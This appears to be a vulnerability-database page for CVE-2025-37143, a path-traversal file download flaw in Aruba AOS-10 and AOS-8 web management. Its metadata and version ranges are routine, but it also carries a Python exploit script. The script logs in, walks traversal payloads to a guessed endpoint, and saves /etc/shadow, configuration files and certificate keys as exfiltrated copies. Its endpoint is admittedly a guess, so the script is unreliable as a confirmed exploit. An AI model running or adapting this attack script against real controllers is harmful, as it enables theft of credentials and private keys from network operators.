Security Vulnerability Report
中文
CVE-2025-37143 CVSS 4.9 MEDIUM

CVE-2025-37143

Published: 2025-10-14 17:15:41
Last Modified: 2025-11-12 17:44:21

Description

An arbitrary file download vulnerability exists in the web-based management interface of AOS-10 GW and AOS-8 Controller/Mobility Conductor operating systems. Successful exploitation could allow an Authenticated malicious actor to download arbitrary files through carefully constructed exploits.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
AOS-10 Gateway 存在漏洞的版本
AOS-8 Controller 存在漏洞的版本
AOS-8 Mobility Conductor 存在漏洞的版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-37143 - HPE Aruba AOS-10/AOS-8 Arbitrary File Download PoC # Exploit demonstrates path traversal in web management interface # Requires authenticated high-privilege credentials import requests from urllib.parse import quote TARGET_URL = "https://<target-aruba-controller>/" USERNAME = "admin" PASSWORD = "<password>" # Files of interest to exfiltrate SENSITIVE_FILES = [ "/etc/passwd", "/etc/shadow", "/config/system.cfg", "/config/backup.cfg", "/flash/cert/server.pem", "/flash/config/management.cfg", "/tmp/debug.log" ] def exploit_path_traversal(session, target_file): """ Exploit path traversal to download arbitrary files The vulnerable endpoint does not sanitize file path parameters """ # Path traversal payload - traverse out of web root traversal_payload = "../../../../../../.." + target_file encoded_payload = quote(traversal_payload, safe='') # Vulnerable endpoint (example - actual endpoint may vary) endpoint = f"{TARGET_URL}screens/cmnutil/execCommand/download" params = { "file": encoded_payload, "action": "download" } try: response = session.get(endpoint, params=params, verify=False, timeout=10) if response.status_code == 200 and len(response.content) > 0: print(f"[+] Successfully downloaded: {target_file}") print(f"[+] Content preview: {response.text[:200]}") return response.content else: print(f"[-] Failed to download: {target_file}") return None except Exception as e: print(f"[-] Error: {e}") return None def main(): session = requests.Session() # Step 1: Authenticate with high-privilege credentials login_url = f"{TARGET_URL}screens/login" login_data = { "username": USERNAME, "password": PASSWORD } print("[*] Authenticating to Aruba Controller...") resp = session.post(login_url, data=login_data, verify=False) if resp.status_code == 200 and "login" not in resp.url: print("[+] Authentication successful") # Step 2: Exploit path traversal to download sensitive files for target_file in SENSITIVE_FILES: print(f"\n[*] Attempting to download: {target_file}") content = exploit_path_traversal(session, target_file) if content: # Save exfiltrated content filename = target_file.replace("/", "_") with open(f"exfiltrated_{filename}", "wb") as f: f.write(content) print(f"[+] Saved to: exfiltrated_{filename}") else: print("[-] Authentication failed") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-37143", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:15:41.230", "lastModified": "2025-11-12T17:44:20.810", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An arbitrary file download vulnerability exists in the web-based management interface of AOS-10 GW and AOS-8 Controller/Mobility Conductor operating systems. Successful exploitation could allow an Authenticated malicious actor to download arbitrary files through carefully constructed exploits."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.10.0.0", "versionEndExcluding": "8.10.0.19", "matchCriteriaId": "3D5F48C7-AD51-4641-9CBA-9DE9B516819E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.12.0.0", "versionEndExcluding": "8.12.0.6", "matchCriteriaId": "057AA8F5-FF66-44E9-8E06-D2B9E8B91AD2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.13.0.0", "versionEndExcluding": "8.13.1.0", "matchCriteriaId": "D4B066B5-D01B-43AE-B4DC-AF560D6B953C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.4.0.0", "versionEndExcluding": "10.4.1.9", "matchCriteriaId": "04F61E46-8412-4B8D-BE7B-EBF61BE52C54"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.7.0.0", "versionEndExcluding": "10.7.2.1", "matchCriteriaId": "BEF8618F-C126-4F8F-951F-6D62FE8FAB22"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04957en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}